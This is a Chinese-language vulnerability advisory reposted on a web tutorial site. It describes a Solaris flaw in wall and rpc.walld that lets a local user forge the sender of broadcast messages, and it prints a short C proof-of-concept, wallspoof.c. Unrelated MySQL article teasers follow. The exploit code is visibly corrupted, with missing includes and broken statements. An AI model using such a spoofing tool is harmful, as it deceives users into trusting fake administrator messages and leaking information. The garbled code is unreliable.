Sun Solaris Wall 信息来源可伪造缺陷-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

Sun Solaris Wall 信息来源可伪造缺陷

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 03:05 PM

solarissunforgeryinformationsourcedefect

涉及程序： Sun Solaris Wall 描述： Sun Solaris Wall 信息来源可伪造缺陷详细：在Solaris中，wall程序用于将一些信息广播到登陆到系统上的每一个用户。守护进程RPC(rpc.walld)用来监听并接收远程主机的wall请求，当接收到wall请求时将调用 wall

涉及程序：
Sun Solaris Wall

描述：
Sun Solaris Wall 信息来源可伪造缺陷

详细：

在Solaris中，wall程序用于将一些信息广播到登陆到系统上的每一个用户。

守护进程RPC(rpc.walld)用来监听并接收远程主机的wall请求，当接收到wall请求时将调用 wall 程序, 由wall将收到的讯息发送给分时系统(time-sharing system)上所有的终端机。wall区别于本地和远程用户请求消息是通过检查stderr文件描述符是否指向对应的tty。如果不是，wall程序将检查消息前5个字节是否为"From"；如果是，下一个非空白字符必须为user@host形式。

恶意用户可在执行程序/usr/sbin/wall前通过简单关闭stderr，并发送一个伪造的"From"报头来伪造rpc.walld信息，使用户接收到此消息时，误以为是管理员发过来的信息。

攻击者可利用此缺陷通过发送伪造信息愚弄目标网络中普通用户，使他们信以为真而进行一些可能泄露敏感信息的行为。

受影响系统：
Sun Solaris Wall
- Sun Solaris 2.x 至 9.0

攻击方法：

/*
wallspoof.c - SOLARIS (X86/SPARC) Exploit
Don't use this in a malicious way! (i.e. to own people)
*/
#include
#include
#include

int main(int argc, char **argv)
{
char *userhost;
char mesg[2050];
FILE *tmp;
if (argc ?fprintf (stderr, "usage: wallspoof user@host\n");
?exit (-1);
}
userhost = argv[1];
if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
?perror ("open");
?exit (-1);
}
printf ("Enter your message below. End your message with an EOF (Control+D).\n");
fprintf (tmp, "From %s:", userhost);
while (fgets(mesg, 2050, stdin) != NULL)
?fprintf (tmp, "%s", mesg);
fclose (tmp);
fclose (stderr);
printf ("\n");
system ("/usr/sbin/wall unlink ("/tmp/rxax");
}

解决方案：
目前厂商还没有提供补丁或升级程序，建议用户随时关注厂商站点：

http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-access

附加信息：
无

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Adding Users to MySQL: The Complete TutorialMay 12, 2025 am 12:14 AM

Mastering the method of adding MySQL users is crucial for database administrators and developers because it ensures the security and access control of the database. 1) Create a new user using the CREATEUSER command, 2) Assign permissions through the GRANT command, 3) Use FLUSHPRIVILEGES to ensure permissions take effect, 4) Regularly audit and clean user accounts to maintain performance and security.

Mastering MySQL String Data Types: VARCHAR vs. TEXT vs. CHARMay 12, 2025 am 12:12 AM

ChooseCHARforfixed-lengthdata,VARCHARforvariable-lengthdata,andTEXTforlargetextfields.1)CHARisefficientforconsistent-lengthdatalikecodes.2)VARCHARsuitsvariable-lengthdatalikenames,balancingflexibilityandperformance.3)TEXTisidealforlargetextslikeartic

MySQL: String Data Types and Indexing: Best PracticesMay 12, 2025 am 12:11 AM

Best practices for handling string data types and indexes in MySQL include: 1) Selecting the appropriate string type, such as CHAR for fixed length, VARCHAR for variable length, and TEXT for large text; 2) Be cautious in indexing, avoid over-indexing, and create indexes for common queries; 3) Use prefix indexes and full-text indexes to optimize long string searches; 4) Regularly monitor and optimize indexes to keep indexes small and efficient. Through these methods, we can balance read and write performance and improve database efficiency.

MySQL: How to Add a User RemotelyMay 12, 2025 am 12:10 AM

ToaddauserremotelytoMySQL,followthesesteps:1)ConnecttoMySQLasroot,2)Createanewuserwithremoteaccess,3)Grantnecessaryprivileges,and4)Flushprivileges.BecautiousofsecurityrisksbylimitingprivilegesandaccesstospecificIPs,ensuringstrongpasswords,andmonitori

The Ultimate Guide to MySQL String Data Types: Efficient Data StorageMay 12, 2025 am 12:05 AM

TostorestringsefficientlyinMySQL,choosetherightdatatypebasedonyourneeds:1)UseCHARforfixed-lengthstringslikecountrycodes.2)UseVARCHARforvariable-lengthstringslikenames.3)UseTEXTforlong-formtextcontent.4)UseBLOBforbinarydatalikeimages.Considerstorageov

MySQL BLOB vs. TEXT: Choosing the Right Data Type for Large ObjectsMay 11, 2025 am 12:13 AM

When selecting MySQL's BLOB and TEXT data types, BLOB is suitable for storing binary data, and TEXT is suitable for storing text data. 1) BLOB is suitable for binary data such as pictures and audio, 2) TEXT is suitable for text data such as articles and comments. When choosing, data properties and performance optimization must be considered.

MySQL: Should I use root user for my product?May 11, 2025 am 12:11 AM

No,youshouldnotusetherootuserinMySQLforyourproduct.Instead,createspecificuserswithlimitedprivilegestoenhancesecurityandperformance:1)Createanewuserwithastrongpassword,2)Grantonlynecessarypermissionstothisuser,3)Regularlyreviewandupdateuserpermissions

MySQL String Data Types Explained: Choosing the Right Type for Your DataMay 11, 2025 am 12:10 AM

MySQLstringdatatypesshouldbechosenbasedondatacharacteristicsandusecases:1)UseCHARforfixed-lengthstringslikecountrycodes.2)UseVARCHARforvariable-lengthstringslikenames.3)UseBINARYorVARBINARYforbinarydatalikecryptographickeys.4)UseBLOBorTEXTforlargeuns

See all articles